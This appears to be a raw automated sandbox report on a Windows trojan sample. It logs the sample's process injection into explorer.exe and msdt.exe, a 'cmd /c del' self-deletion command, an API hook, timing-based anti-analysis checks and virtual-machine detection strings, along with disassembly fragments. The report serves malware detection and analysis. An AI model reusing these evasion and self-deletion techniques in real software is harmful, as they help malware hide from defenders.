              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_0059A47A NtClose,2_2_0059A47A
              Source: 7pECKdsaig.exe Static PE information: No import functions for PE file found
              Source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
              Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000199F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
              Source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000167C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
              Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
              Source: 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
              Source: 7pECKdsaig.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 7pECKdsaig.exe Static PE information: Section .text
              Source: 7pECKdsaig.exe ReversingLabs: Detection: 76%
              Source: 7pECKdsaig.exe Virustotal: Detection: 59%
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Users\user\Desktop\7pECKdsaig.exe C:\Users\user\Desktop\7pECKdsaig.exe
              Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
              Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
              Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
              Source: classification engine Classification label: mal100.troj.evad.winEXE@6/1@4/1
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_01
              Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: 7pECKdsaig.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9798E push cs; retf 0_2_00A979AB
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9719C push esp; retf 0_2_00A971D0
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A979D3 push esi; ret 0_2_00A979F3
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A96911 push edi; ret 0_2_00A96912
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9F110 push ecx; ret 0_2_00A9F125
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4A5 push eax; ret 0_2_00A9D4F8
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4FB push eax; ret 0_2_00A9D562
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4F2 push eax; ret 0_2_00A9D4F8
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D55C push eax; ret 0_2_00A9D562
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0176D0D1 push ecx; ret 0_2_0176D0E4
              Source: C:\Windows\explorer.exe Code function: 1_2_0E176B1E push esp; retn 0000h 1_2_0E176B1F
              Source: C:\Windows\explorer.exe Code function: 1_2_0E176B02 push esp; retn 0000h 1_2_0E176B03
              Source: C:\Windows\explorer.exe Code function: 1_2_0E1769B5 push esp; retn 0000h 1_2_0E176AE7
              Source: C:\Windows\explorer.exe Code function: 1_2_100DBB02 push esp; retn 0000h 1_2_100DBB03
              Source: C:\Windows\explorer.exe Code function: 1_2_100DBB1E push esp; retn 0000h 1_2_100DBB1F
              Source: C:\Windows\explorer.exe Code function: 1_2_100DB9B5 push esp; retn 0000h 1_2_100DBAE7
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B1D0D1 push ecx; ret 2_2_04B1D0E4
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E158 push 150B24F0h; iretd 2_2_0059E15F
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059F11E push ecx; ret 2_2_0059F125
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00596911 push edi; ret 2_2_00596912
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_005979D3 push esi; ret 2_2_005979F3
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059719C push esp; retf 2_2_005971D0
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059798E push cs; retf 2_2_005979AB
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E224 pushfd; ret 2_2_0059E22A
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4FB push eax; ret 2_2_0059D562
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4F2 push eax; ret 2_2_0059D4F8
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4A5 push eax; ret 2_2_0059D4F8
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D55C push eax; ret 2_2_0059D562
              Source: initial sample Static PE information: section name: .text entropy: 7.409588215160137

              Hooking and other Techniques for Hiding and Protection

              Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
              Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\7pECKdsaig.exe RDTSC instruction interceptor: First address: 0000000000A89904 second address: 0000000000A8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\7pECKdsaig.exe RDTSC instruction interceptor: First address: 0000000000A89B6E second address: 0000000000A89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000589904 second address: 000000000058990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000589B6E second address: 0000000000589B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_1-13950
              Source: C:\Windows\explorer.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89AA0 rdtsc 0_2_00A89AA0
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 865
              Source: C:\Windows\SysWOW64\msdt.exe API coverage: 9.7 %
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Process information queried: ProcessInformation
              Source: explorer.exe, 00000001.00000003.289061192.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000001.00000003.461296315.000000000683A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000001.00000000.263735895.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
              Source: explorer.exe, 00000001.00000002.523833052.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530259036.000000000F54E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
              Source: explorer.exe, 00000001.00000000.263735895.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: explorer.exe, 00000001.00000003.462488828.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60101a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir~
              Source: explorer.exe, 00000001.00000000.263735895.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
              Source: explorer.exe, 00000001.00000002.525713546.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
              Source: explorer.exe, 00000001.00000002.525713546.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h] 0_2_0171B171
              Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B98CD6 mov eax, dword ptr fs:[00000030h]2_2_04B98CD6
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]2_2_04AF002D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]2_2_04AF002D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]2_2_04AF002D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]2_2_04AF002D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF002D mov eax, dword ptr fs:[00000030h]2_2_04AF002D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFBC2C mov eax, dword ptr fs:[00000030h]2_2_04AFBC2C
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]2_2_04ADB02A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]2_2_04ADB02A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]2_2_04ADB02A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADB02A mov eax, dword ptr fs:[00000030h]2_2_04ADB02A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h]2_2_04B47016
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h]2_2_04B47016
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B47016 mov eax, dword ptr fs:[00000030h]2_2_04B47016
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h]2_2_04B94015
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B94015 mov eax, dword ptr fs:[00000030h]2_2_04B94015
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h]2_2_04B9740D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h]2_2_04B9740D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B9740D mov eax, dword ptr fs:[00000030h]2_2_04B9740D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B81C06 mov eax, dword ptr fs:[00000030h]2_2_04B81C06
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]2_2_04B46C0A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]2_2_04B46C0A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]2_2_04B46C0A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46C0A mov eax, dword ptr fs:[00000030h]2_2_04B46C0A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE746D mov eax, dword ptr fs:[00000030h]2_2_04AE746D
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B82073 mov eax, dword ptr fs:[00000030h]2_2_04B82073
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B91074 mov eax, dword ptr fs:[00000030h]2_2_04B91074
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFA44B mov eax, dword ptr fs:[00000030h]2_2_04AFA44B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h]2_2_04B5C450
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B5C450 mov eax, dword ptr fs:[00000030h]2_2_04B5C450
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h]2_2_04AE0050
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE0050 mov eax, dword ptr fs:[00000030h]2_2_04AE0050
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]2_2_04B451BE
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]2_2_04B451BE
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]2_2_04B451BE
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B451BE mov eax, dword ptr fs:[00000030h]2_2_04B451BE
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF35A1 mov eax, dword ptr fs:[00000030h]2_2_04AF35A1
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h]2_2_04AF61A0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF61A0 mov eax, dword ptr fs:[00000030h]2_2_04AF61A0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B469A6 mov eax, dword ptr fs:[00000030h]2_2_04B469A6
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h]2_2_04B905AC
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B905AC mov eax, dword ptr fs:[00000030h]2_2_04B905AC
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]2_2_04AF1DB5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]2_2_04AF1DB5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]2_2_04AF1DB5
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]2_2_04AC2D8A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]2_2_04AC2D8A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]2_2_04AC2D8A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]2_2_04AC2D8A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AC2D8A mov eax, dword ptr fs:[00000030h]2_2_04AC2D8A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFA185 mov eax, dword ptr fs:[00000030h]2_2_04AFA185
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AEC182 mov eax, dword ptr fs:[00000030h]2_2_04AEC182
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]2_2_04AF2581
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]2_2_04AF2581
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]2_2_04AF2581
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2581 mov eax, dword ptr fs:[00000030h]2_2_04AF2581
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h]2_2_04AFFD9B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AFFD9B mov eax, dword ptr fs:[00000030h]2_2_04AFFD9B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF2990 mov eax, dword ptr fs:[00000030h]2_2_04AF2990
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B78DF1 mov eax, dword ptr fs:[00000030h]2_2_04B78DF1
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]2_2_04ACB1E1
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]2_2_04ACB1E1
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]2_2_04ACB1E1
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]2_2_04ADD5E0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]2_2_04ADD5E0
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]2_2_04B8FDE2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]2_2_04B8FDE2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]2_2_04B8FDE2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h]2_2_04B8FDE2
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B541E8 mov eax, dword ptr fs:[00000030h]2_2_04B541E8
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]2_2_04B46DC9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]2_2_04B46DC9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]2_2_04B46DC9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46DC9 mov ecx, dword ptr fs:[00000030h]2_2_04B46DC9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]2_2_04B46DC9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h]2_2_04B46DC9
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B8E539 mov eax, dword ptr fs:[00000030h]2_2_04B8E539
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B4A537 mov eax, dword ptr fs:[00000030h]2_2_04B4A537
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04B98D34 mov eax, dword ptr fs:[00000030h]2_2_04B98D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]2_2_04AE4120
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]2_2_04AE4120
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]2_2_04AE4120
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h]2_2_04AE4120
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AE4120 mov ecx, dword ptr fs:[00000030h]2_2_04AE4120
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h]2_2_04AF4D3B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h]2_2_04AF4D3B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h]2_2_04AF4D3B
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h]2_2_04AF513A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h]2_2_04AF513A
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
              Source: C:\Windows\SysWOW64\msdt.exeCode function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h]2_2_04AD3D34
